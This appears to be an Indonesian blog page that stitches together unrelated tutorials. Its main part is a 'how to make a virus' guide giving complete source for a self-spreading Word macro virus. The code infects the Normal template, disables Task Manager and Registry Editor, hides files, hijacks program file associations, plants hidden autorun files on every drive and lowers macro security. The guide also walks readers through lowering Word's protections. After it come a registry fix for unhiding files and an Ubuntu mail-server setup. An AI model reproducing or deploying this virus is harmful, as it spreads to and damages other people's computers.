Cara Membuat Virus

Pendahuluan
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Cara Kerja
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD, OS/2 IBM, dan Sun Operating System. Virus yang ganas akan merusak perangkat keras.

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.
Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).
Pasti banyak bertanya kenapa kali ini membahas tentang cara membuat virus? Biasanya kan lebih sering membahas analisis virus atau antivirusnya itu….
Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.
Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS

1. Buka Ms.Word (hanya contoh)
2. buka tools > Macro> Visual Basic Editor

• Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.


Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, aku dah siapkan kok sourcenya. Makan neh source code!

‘This is my code’s virus

‘

‘Macro Viruses

‘[Macroid]

‘

‘Hanya untuk pembelajaran

Private Sub Document_Close()

Dim AD, NT As Object

Dim isi As String

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

If AD.Name <> “Macroid” Then

AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

AD.Name = “Macroid”

isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

AD.CodeModule.AddFromString isi

ActiveDocument.Save

End If

If NT.Name <> “Macroid” Then

NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

NT.Name = “Macroid”

isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

NT.CodeModule.AddFromString isi

NormalTemplate.Save

End If

If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″

End If

On Error Resume Next

Dim b As Object

Set b = CreateObject(“Wscript.Shell”)

b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”

b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

On Error Resume Next

Dim rog As Integer

Dim atr, vbs, Tipu(10), Trik(10) As String

For a = 66 To 90

partisi = Chr$(a)

vbs = partisi & “:\auto.vbs”

atr = partisi & “:\autorun.inf”

Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

Tipu(3) = partisi & “:\Titip File sebentar.doc”

Tipu(4) = partisi & “:\jangan di baca.doc”

Tipu(5) = partisi & “:\buku harian.doc”

Tipu(6) = partisi & “:\cerita hangat.doc”

Tipu(7) = partisi & “:\Punya Baim.doc”

Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

Tipu(10) = partisi & “:\Trik Sulap.doc”

If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

Randomize

rog = Int(10 * Rnd) + 1

Open Tipu(rog) For Output As #1

Print #1, “”

Close #1

End If

Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

Trik(2) = partisi & “:\cerita cinta.doc”

Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

Trik(6) = partisi & “:\Cheat game RF.doc”

Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

Trik(8) = partisi & “:\Goosebumps.doc”

Trik(9) = partisi & “:\FearStreet.doc”

Trik(10) = partisi & “:\R.L.Stine.doc”

If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

Randomize

rogi = Int(10 * Rnd) + 1

Open Trik(rogi) For Output As #1

Print #1, “”

Close #1

End If

Open atr For Output As #1

Print #1, “[Autorun]“

Print #1, “shell\Open\command=wscript.exe auto.vbs”

Close #1

SetAttr atr, vbHidden + vbSystem

Open vbs For Output As #1

Print #1, “dim a”

Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Close #1

SetAttr vbs, vbHidden + vbSystem

Next a

If Dir(Environ$(“windir”) & “\Macroid.doc”) = “” Then

Dim isicrita As String

isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008″ & vbCrLf & vbCrLf & _

Chr(34) & “Ms.Word is a thing that can be used as a power to break everything…. ” & Chr(34) & vbCrLf & “(Morphic)”

Open Environ$(“windir”) & “\Macroid.doc” For Output As #1

Print #1, isicrita

Close #1

End If

If Dir(Environ$(“windir”) & “\avmc.vbs”) = “” Then

Open Environ$(“windir”) & “\avmc.vbs” For Output As #1

Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”

Print #1, “for each FD in fs.drives”

Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”

Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”

Print #1, “end if”

Print #1, “Next”

Close #1

End If

ActiveDocument.Save

NormalTemplate.Save

End Sub

Private Sub Document_Open()

CommandBars(“Tools”).Controls(“Macro”).Visible = False

CommandBars(“Tools”).Controls(“Macro”).Enabled = False

CommandBars(“Tools”).Controls(“Customize…”).Visible = False

CommandBars(“Tools”).Controls(“Options…”).Visible = False

Dim AD, NT As Object

Dim isi As String

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

If AD.Name <> “Macroid” Then

AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

AD.Name = “Macroid”

isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

AD.CodeModule.AddFromString isi

ActiveDocument.Save

End If

If NT.Name <> “Macroid” Then

NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

NT.Name = “Macroid”

isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

NT.CodeModule.AddFromString isi

NormalTemplate.Save

End If

If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″

End If

On Error Resume Next

Dim b As Object

Set b = CreateObject(“Wscript.Shell”)

b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”

b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

On Error Resume Next

Dim rog As Integer

Dim atr, vbs, Tipu(10), Trik(10) As String

For a = 66 To 90

partisi = Chr$(a)

vbs = partisi & “:\auto.vbs”

atr = partisi & “:\autorun.inf”

Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

Tipu(3) = partisi & “:\Titip File sebentar.doc”

Tipu(4) = partisi & “:\jangan di baca.doc”

Tipu(5) = partisi & “:\buku harian.doc”

Tipu(6) = partisi & “:\cerita hangat.doc”

Tipu(7) = partisi & “:\Punya Baim.doc”

Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

Tipu(10) = partisi & “:\Trik Sulap.doc”

If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

Randomize

rog = Int(10 * Rnd) + 1

Open Tipu(rog) For Output As #1

Print #1, “”

Close #1

End If

Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

Trik(2) = partisi & “:\cerita cinta.doc”

Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

Trik(6) = partisi & “:\Cheat game RF.doc”

Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

Trik(8) = partisi & “:\Goosebumps.doc”

Trik(9) = partisi & “:\FearStreet.doc”

Trik(10) = partisi & “:\R.L.Stine.doc”

If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

Randomize

rogi = Int(10 * Rnd) + 1

Open Trik(rogi) For Output As #1

Print #1, “”

Close #1

End If

Open atr For Output As #1

Print #1, “[Autorun]“

Print #1, “shell\Open\command=wscript.exe auto.vbs”

Close #1

SetAttr atr, vbHidden + vbSystem

Open vbs For Output As #1

Print #1, “dim a”

Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Close #1

SetAttr vbs, vbHidden + vbSystem

Next a

End Sub

Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.
EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI



Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!
Jawabannya lihat di bawah!!

CARA MEMBUAT VIRUS LANJUTAN
Ini nih, dulu saya udah janji untuk ngelanjutin sample virus macro yang saya buat dulu. Di tutorial kali ini saya akan jelasin sedikit demi sedikit untuk mempelajari virus macro ini…
Pernah dengar virus Macroid? Itu adalah salah satu contoh virus macro yang saya buat.
Langsung aja.
Buka visual Basic editor di Tools>macro>visual basic editor ato tekan pada keyboard Alt+F11
Tampilannya mirip dengan VB6 kita, dan penggunaan sourcenya juga gak jauh beda…
Misalnya :
Dim AD as object
Ya gak. Mirip kan dengan script di VB6? Dan dilanjutkan dengan penggunaan ”set”. Misalnya :
set AD=ActiveDocument.VBProject.VBComponents.Item(1)
ha ha ha… oke deh gak usah main-main. Langsung keserius nya aja…
Script dibawah ini untuk mengubah ”Name” document yang diinfeksi (umumnya ini yang dijadikan sebagai nama virus macro kita)

dim AD as object set AD=ActiveDocument.VBProject.VBComponents.Item(1)

if AD.Name “Macroid” then AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines AD.Name = “Macroid” end if

contoh script diatas adalah untuk mengubah name document menjadi ”Macroid”. (efek ini baru bisa dijalankan setelah virus yang utuh dieksekusi)
Script diatas bisa kamu sisipkan di ”Document_Close()” ato di ”Document_Open()” ato di ”Document_New()”
Kalo disisipkan di “Document_Close()” efeknya akan berjalan saat document ditutup. Dan begitu juga dengan “Document_Open()” dan “Document_new()”
Kalo disisipkan di “Document_Open()” efeknya akan berjalan saat document dibuka.
Kalo disisipkan di “Document_new()” efeknya akan aberjalan saat document baru dibuka.
Ini contoh gambarnya…

Efeknya adalah ini.

Itu tandanya virus “Macroid”!!! ha ha ha… oke.
Sebenarnya saya mau menjelaskan lebih banyak soal trik-trik virus macro, tapi saya yakin sebelum sampai diatas pasti masih banyak masalah untuk kalian…
Sebelumnya kalian harus perhatikan security macro kalian.
Lihat Tools>Macro>security

Yang harus kita pilih adalah opsi ”Low” supaya Ms.Word akan menjalankan semua script di visual Basic Editor. Karena kita masih belajar-belajar biarkan saja kita yang atur security ini, nanti kalo kita udah mau bikin virus macro, ada caranya supaya virus kita yang ngatur security ini… tenang aja…
Setelah kita set securitynya, silakan save document terus hidupkan document kita tadi.
Ada satu lagi masalah… kalo nanti ”misalnya” ada gambar seperti dibawah ini:

Berarti ada hal yang harus kita atur dulu… Buka lagi security macro tadi.
Lalu pada tab Trusted Publishers silakan ceklis “Trust aceess to Visual Basic Project”

Menampilkan Hidden File & Folder

Pernah file dan/atau folder-folder kamu hilang karena komputer terserang virus?  Tenang…! Tidak perlu panik dulu. Tulisan kali ini akan membahas tutorial bagaimana mengembalikan file dan folder yang “hilang” (sebenarnya hanya ter-hidden alias disembunyikan) oleh virus pada windows. Meski kasus ini sudah lama ada, virus-virus baru masih saja hobi mengulangi kasus meng-hidden file seperti ini.

Perlu ditekankan bahwa file dan folder yang bisa dikembalikan menjadi normal adalah file atau folder yang “hanya” disembunyikan oleh virus. File dan folder yang benar-benar hilang atau terhapus tidak bisa dikembalikan lagi, kecuali menggunakan sistem restore.
Okeh, kita mulai tutorial bagaimana menampilkan kembali file dan folder yang di-hidden oleh virus:
1. Start > Run > Notepad
Copy Paste-kan :
Code:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ServerAdminUI”=dword:00000000
“Hidden”=dword:00000001
“ShowCompColor”=dword:00000001
“HideFileExt”=dword:00000001
“DontPrettyPath”=dword:00000000
“ShowInfoTip”=dword:00000001
“HideIcons”=dword:00000000
“MapNetDrvBtn”=dword:00000000
“WebView”=dword:00000001
“Filter”=dword:00000000
“SuperHidden”=dword:00000001
“SeparateProcess”=dword:00000000
“ListviewAlphaSelect”=dword:00000001
“ListviewShadow”=dword:00000001
“ListviewWatermark”=dword:00000001
“TaskbarAnimations”=dword:00000001
“StartMenuInit”=dword:00000002
“StartButtonBalloonTip”=dword:00000002
“TaskbarSizeMove”=dword:00000000
“TaskbarGlomming”=dword:00000000
“NoNetCrawling”=dword:00000000
“FolderContentsInfoTip”=dword:00000001
“FriendlyTree”=dword:00000001
“WebViewBarricade”=dword:00000000
“DisableThumbnailCache”=dword:00000000
“ShowSuperHidden”=dword:00000001
“ClassicViewState”=dword:00000000
“PersistBrowsers”=dword:00000000
“Start_LargeMFUIcons”=dword:00000001
“Start_MinMFU”=dword:00000006

Save file dgn nama : showhiddenfiles.reg ( save dimana saja )
2. Start > Run > Notepad
Copy Paste-kan :
Code:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]
“RegPath”=”Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced”
“Text”=”@shell32.dll,-30501″
“Type”=”radio”
“CheckedValue”=dword:00000002
“ValueName”=”Hidden”
“DefaultValue”=dword:00000000
“HKeyRoot”=dword:80000001
“HelpID”=”shell.hlp#51104″

Save file dgn nama : nohidden.reg ( terserah mo di save dimana saja lg…heheh )
3. Start > Run > Notepad
Copy Paste-kan :
Code:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
“RegPath”=”Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced”
“Text”=”@shell32.dll,-30500″
“Type”=”radio”
“CheckedValue”=dword:00000001
“ValueName”=”Hidden”
“DefaultValue”=dword:00000002
“HKeyRoot”=dword:80000001
“HelpID”=”shell.hlp#51105″

Save file dgn nama : showall.reg ( terserah mo di save dimana saja lg….wkwkwk )
Setelah 3 file tersebut diatas jadi, klik satu persatu mulai dr no. 1 s/d 3 ( Pilih “Yes” )

membuat Mail Server dengan Ubuntu 9.10

apache2 , mysql , postfix, dovecot , squirellmail senjata utamanya
postfix adalah sebuah program pengirim email sebagai pengganti dari sendmail.
Postfix is a free and open-source mail transfer agent (MTA) that routes and delivers electronic mail.
It is intended as a fast, easier-to-administer, and secure alternative to the widely-used Sendmail MTA. (wiki)
Dovecot is an open source IMAP and POP3 server for Linux/UNIX-like systems, written primarily with security in mind. Developed by Timo Sirainen, Dovecot was first released in July 2002. Dovecot primarily aims to be a lightweight, fast and easy to set up open source mailserver. (wiki)
1. Persiapan sistem untuk Ubuntu 9.10
Agar nantinya tidak terdapat broken system alangkah baek nya install ubuntu dengan build essential
sudo apt-get install build-essential

2. Install file utama

sudo apt-get install postfix postfix-msql php5-imap dovecot-pop3d dovecot-imapd
php5-mysql squirrelmail apache2

3. Cek system apakah apache2 postfix dan dovecot ny udah ada lum disystem

service apache2 status && service postfix status && service dovecot status

4. Buat Database Untuk Postfix

root@kaitokid:~# mysql -u root -p     // -p masukkan passwd mysql nya

mysql> create database postfix; mysql> grant all privileges on postfix.* to 'postfix'@'localhost' identified by 'postfixpassword'; mysql> grant all privileges on postfix.* to 'postfix'@'127.0.0.1' identified by 'postfixpassword'; mysql> exit

// ganti 'postfixpasswd' sesuai pasword yang di inginkan & 'postfix'
     sesuai dengan user yang dinginkan

5. Download postfixadmin untuk mempermudah administrasi mail

 http://sourceforge.net/projects/postfixadmin/

6. Extract hasil download postfixadmin dan pindahkan ke /var/www

 root@kaitokid:~# cd /var/www/ root@kaitokid:/var/www# tar xzf /home/kaitokid/postfixadmin-2.**.tar.gz root@kaitokid:/var/www# mv postfixadmin-2.**/ postfix root@kaitokid:/var/www# chown -R www-data.www-data /var/www

7. Setup config.inc.php postfixadmin

root@kaitokid:~# nano /var/www/postfix/config.inc.php

// Database Config
   // mysql = MySQL 3.23 and 4.0
   // mysqli = MySQL 4.1
   // pgsql = PostgreSQL
  $CONF['database_type'] = 'mysqli'; //sesuaikan dg sql nya untuk mysql seri 4 keatas gunakan mysqli
  $CONF['database_host'] = 'localhost';
  $CONF['database_user'] = 'postfix';   // user database di mysql  lihat nomer 4
  $CONF['database_password'] = 'postfixpassword';  // user database mysql lihat nomer 4
  $CONF['database_name'] = 'postfix';  $CONF['database_prefix'] = '';  //default kosong

8. Setup postfix admin

buka web browser firefox kemudian buka URL
http://127.0.0.1/postfix/setup.php
// waktu instalasi pastikan tidak ada error & untuk ppostfixadmin series 2.3 file setup tidak perlu dihapus
//pastikan web server di komputer udah jalan

9. Konfigurasi MySQL postfix

//konfigurasi user & passwd sesuai dg nomer 4

nano /etc/postfix/mysql_virtual_alias_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = alias
    select_field = goto
    where_field = address

nano /etc/postfix/mysql_virtual_mailbox_maps.cf
    user = postfix
    password = postfixpassword
    hosts = 127.0.0.1
    dbname = postfix
    table = mailbox
    select_field = maildir
    where_field = username
    #additional_conditions = and active = '1'

nano /etc/postfix/mysql_virtual_mailbox_limit_maps.cf
   user = postfix
   password = postfixpassword
   hosts = 127.0.0.1
   dbname = postfix
   table = mailbox
   select_field = quota
   where_field = username
   #additional_conditions = and active = '1'

nano /etc/postfix/mysql_virtual_domains_maps.cf
  user = postfix
  password = postfixpassword
  hosts = 127.0.0.1
  dbname = postfix
  table = domain
  select_field = domain
  where_field = domain
  #additional_conditions = and backupmx = '0' and active = '1'

nano /etc/postfix/mysql_relay_domains_maps.cf
   user = postfix
   password = postfixpassword
   hosts = 127.0.0.1
   dbname = postfix
   table = domain
   select_field = domain
   where_field = domain
   #additional_conditions = and backupmx = '1'

chgrp postfix /etc/postfix/mysql_*.cf
  chmod 640 /etc/postfix/mysql_*.cf
  groupadd -g 5000 vmail
  useradd -m -g vmail -u 5000 -d /home/vmail -s /bin/bash vmail

10. konfigurasi postfix main.cf

nano /etc/postfix/main.cf
   # Virtual Mailbox Domain Settings
  //konfigurasi default main.cf untuk opreknya tunggu di part 2 mail server 

  myhostname = ubuntu  //sesuaikan dg hostname komputer yang dipakai mail server
  virtual_alias_maps = mysql:/etc/postfix/mysql_virtual_alias_maps.cf
  virtual_mailbox_domains = mysql:/etc/postfix/mysql_virtual_domains_maps.cf
  virtual_mailbox_maps = mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
  virtual_mailbox_limit = 51200000
  virtual_uid_maps = static:5000
  virtual_gid_maps = static:5000
  virtual_mailbox_base = /home/vmail
  virtual_transport = virtual

   # Additional for quota support
  virtual_create_maildirsize = yes
  virtual_mailbox_extended = yes
  virtual_mailbox_limit_maps = mysql:/etc/postfix/mysql_virtual_mailbox_limit_maps.cf
  virtual_mailbox_limit_override = yes
  virtual_maildir_limit_message = Sorry, the your maildir has overdrawn your diskspace
                       quota, please free up some of spaces of your mailbox try again.
  virtual_overquota_bounce = yes
  alias_maps = hash:/etc/aliases
  alias_database = hash:/etc/aliases
  mydestination =
  relayhost =
  mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
  mailbox_size_limit = 0
  recipient_delimiter = +
  inet_interfaces = all

11. Konfigurasi Dovecot POP3 dan IMAP4

nano /etc/dovecot/dovecot.conf
   protocols = imap pop3
   disable_plaintext_auth = no
